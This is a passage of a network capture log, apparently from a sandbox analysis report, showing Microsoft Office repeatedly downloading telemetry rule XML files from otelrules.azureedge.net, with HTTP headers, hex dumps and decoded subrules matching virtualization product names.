                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:37:05 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                        Content-Length: 485
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:39 GMT
                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BB9769355"
                                                                                                                                                                                                                                                                                        x-ms-request-id: d9045f06-101e-00a2-02d5-339f2e000000
                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                        x-azure-ref: 20241111T153705Z-174f7845968pf68xhC1EWRr4h8000000059g00000000pgv9
                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:05 UTC485INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120660" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        69192.168.2.44982113.107.246.45443
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:05 UTC192OUTGET /rules/rule120662v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:05 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:37:05 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                        Content-Length: 470
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BBB181F65"
                                                                                                                                                                                                                                                                                        x-ms-request-id: aedf17c0-c01e-0046-3ad5-332db9000000
                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                        x-azure-ref: 20241111T153705Z-174f784596886s2bhC1EWR743w000000051g00000000tqf9
                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:05 UTC470INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120662" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        70192.168.2.44982213.107.246.45443
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:05 UTC192OUTGET /rules/rule120661v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:05 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:37:05 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                        Content-Length: 411
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                                                                                                                        ETag: "0x8DC582B989AF051"
                                                                                                                                                                                                                                                                                        x-ms-request-id: 87508ad6-a01e-0098-68d5-338556000000
                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                        x-azure-ref: 20241111T153705Z-174f78459685m244hC1EWRgp2c00000004wg00000000r29m
                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:05 UTC411INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 56 76 5d 5b 49 69 5d 5b 52 72 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d
                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120661" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <SR T="2" R="([Oo][Vv][Ii][Rr][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        71192.168.2.44982413.107.246.45443
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:05 UTC192OUTGET /rules/rule120664v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:05 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:37:05 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                        Content-Length: 502
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BB6A0D312"
                                                                                                                                                                                                                                                                                        x-ms-request-id: 30996da0-701e-006f-5cd5-33afc4000000
                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                        x-azure-ref: 20241111T153705Z-174f78459685726chC1EWRsnbg0000000570000000009dgn
                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:05 UTC502INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120664" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        72192.168.2.44982513.107.246.45443
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:05 UTC192OUTGET /rules/rule120665v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:05 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:37:05 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                        Content-Length: 407
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                                                                                                                                                                                                                                                        ETag: "0x8DC582B9D30478D"
                                                                                                                                                                                                                                                                                        x-ms-request-id: 45a856d6-001e-0017-5bd5-330c3c000000
                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                        x-azure-ref: 20241111T153705Z-174f7845968n2hr8hC1EWR9cag00000004q000000000prs3
                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:05 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 53 73 5d 5b 53 73 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120665" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <SR T="2" R="([Pp][Ss][Ss][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        73192.168.2.44982613.107.246.45443
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:05 UTC192OUTGET /rules/rule120667v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:05 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:37:05 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                        Content-Length: 408
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BB9B6040B"
                                                                                                                                                                                                                                                                                        x-ms-request-id: 954b4d19-301e-0052-53d5-3365d6000000
                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                        x-azure-ref: 20241111T153705Z-174f78459685726chC1EWRsnbg000000057g000000008v9y
                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:05 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 51 71 5d 5b 45 65 5d 5b 4d 6d 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120667" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <SR T="2" R="^([Qq][Ee][Mm][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        74192.168.2.44982713.107.246.45443
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:05 UTC192OUTGET /rules/rule120666v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:05 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:37:05 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                        Content-Length: 474
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BB3F48DAE"
                                                                                                                                                                                                                                                                                        x-ms-request-id: 648756f6-901e-0067-0fd5-33b5cb000000
                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                        x-azure-ref: 20241111T153705Z-174f7845968ljs8phC1EWRe6en00000004w000000000re4q
                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:05 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120666" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        75192.168.2.44982813.107.246.45443
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:05 UTC192OUTGET /rules/rule120668v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:06 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:37:05 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                        Content-Length: 469
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BB3CAEBB8"
                                                                                                                                                                                                                                                                                        x-ms-request-id: 7cd1171a-e01e-0052-10d5-33d9df000000
                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                        x-azure-ref: 20241111T153705Z-174f78459685726chC1EWRsnbg000000052g00000000rs82
                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:06 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120668" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        76192.168.2.44983013.107.246.45443
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:06 UTC192OUTGET /rules/rule120669v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:06 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:37:06 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                        Content-Length: 416
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BB5284CCE"
                                                                                                                                                                                                                                                                                        x-ms-request-id: 16af1629-301e-0033-6dd5-33fa9c000000
                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                        x-azure-ref: 20241111T153706Z-174f78459684bddphC1EWRbht400000004s000000000sxa3
                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:06 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 52 72 5d 5b 45 65 5d 5b 44 64 5d 20 5b 48 68 5d 5b 41 61 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120669" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <SR T="2" R="([Rr][Ee][Dd] [Hh][Aa][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        77192.168.2.44983413.107.246.45443
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:06 UTC192OUTGET /rules/rule120673v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:06 UTC470INHTTP/1.1 200 OK
